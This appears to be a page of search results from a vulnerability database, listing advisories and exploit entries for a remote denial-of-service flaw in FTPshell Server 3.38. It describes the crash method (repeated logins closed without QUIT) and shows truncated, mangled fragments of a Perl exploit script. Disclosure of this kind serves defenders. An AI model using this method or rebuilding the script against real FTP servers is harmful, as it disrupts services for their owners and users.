147 matches found
FTPshell Server 3.38 Malformed PORT/QUIT DoS
The remote host is using FTPshell, an FTP service for Windows. The version of FTPshell installed on the remote host suffers from a denial of service vulnerability that can be exploited by logging into the service, sending a PORT command, and closing the connection without QUITing, all 39 times. C...
FTPshell Server 3.38 - Remote Denial of Service
!/usr/bin/perl Usage: FTPShellFTPDOS.pl FTPShellFTPDOS.pl 127.0.0.1 hello moto FTPshell Server Version 3.38 Download: http://www.ftpshell.com/ use IO::Socket; use Win32; use strict; my$i = ""; my$socket = ""; for $i = 1; $i newPeerAddr = $ARGV0, PeerPort = "21", Proto = "TCP" print "Login $i\n";...
FTPShell FTP Server DoS
Few FTP connections terminated without QUIT command cause service to crash...
[Full-disclosure] Denial of service vulnerability in FTPshell Server Version 3.38
Summary: Denial of service vulnerability in FTPshell Server Version 3.38 http://www.ftpshell.com/ Details: Logging into the FTP server successfully and then closing the connection without using the QUIT command 39 times will cause the ftpshelld.exe process will die. Vulnerable Versions: FTPshell...
FTPshell Server 3.38 - Remote Denial of Service
FTPshell Server 3.38 - Remote Denial of Service !/usr/bin/perl Usage: FTPShellFTPDOS.pl FTPShellFTPDOS.pl 127.0.0.1 hello moto FTPshell Server Version 3.38 Download: http://www.ftpshell.com/ use IO::Socket; use Win32; use strict; my$i = ""; my$socket = ""; for $i = 1; $i newPeerAddr = $ARGV0,...
FTPshell Server <= 3.38 Remote Denial of Service Exploit
No description provided by source. !/usr/bin/perl Usage: FTPShellFTPDOS.pl ip user pass FTPShellFTPDOS.pl 127.0.0.1 hello moto FTPshell Server Version 3.38 Download: http://www.ftpshell.com/ use IO::Socket; use Win32; use strict; my$i = ""; my$socket = ""; for $i = 1; $i = 40; $i++ if $socket =...
FTPshell Server <= 3.38 Remote Denial of Service Exploit
Exploit for unknown platform in category dos / poc ======================================================== FTPshell Server FTPShellFTPDOS.pl 127.0.0.1 hello moto FTPshell Server Version 3.38 Download: http://www.ftpshell.com/ use IO::Socket; use Win32; use strict; my$i = ""; my$socket = ""; for ...